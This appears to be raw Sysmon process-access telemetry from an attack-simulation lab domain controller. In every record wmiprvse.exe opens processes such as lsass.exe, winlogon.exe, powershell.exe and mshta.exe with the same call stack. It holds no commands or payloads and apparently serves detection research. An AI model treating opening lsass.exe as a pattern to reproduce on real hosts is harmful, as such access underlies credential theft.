15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 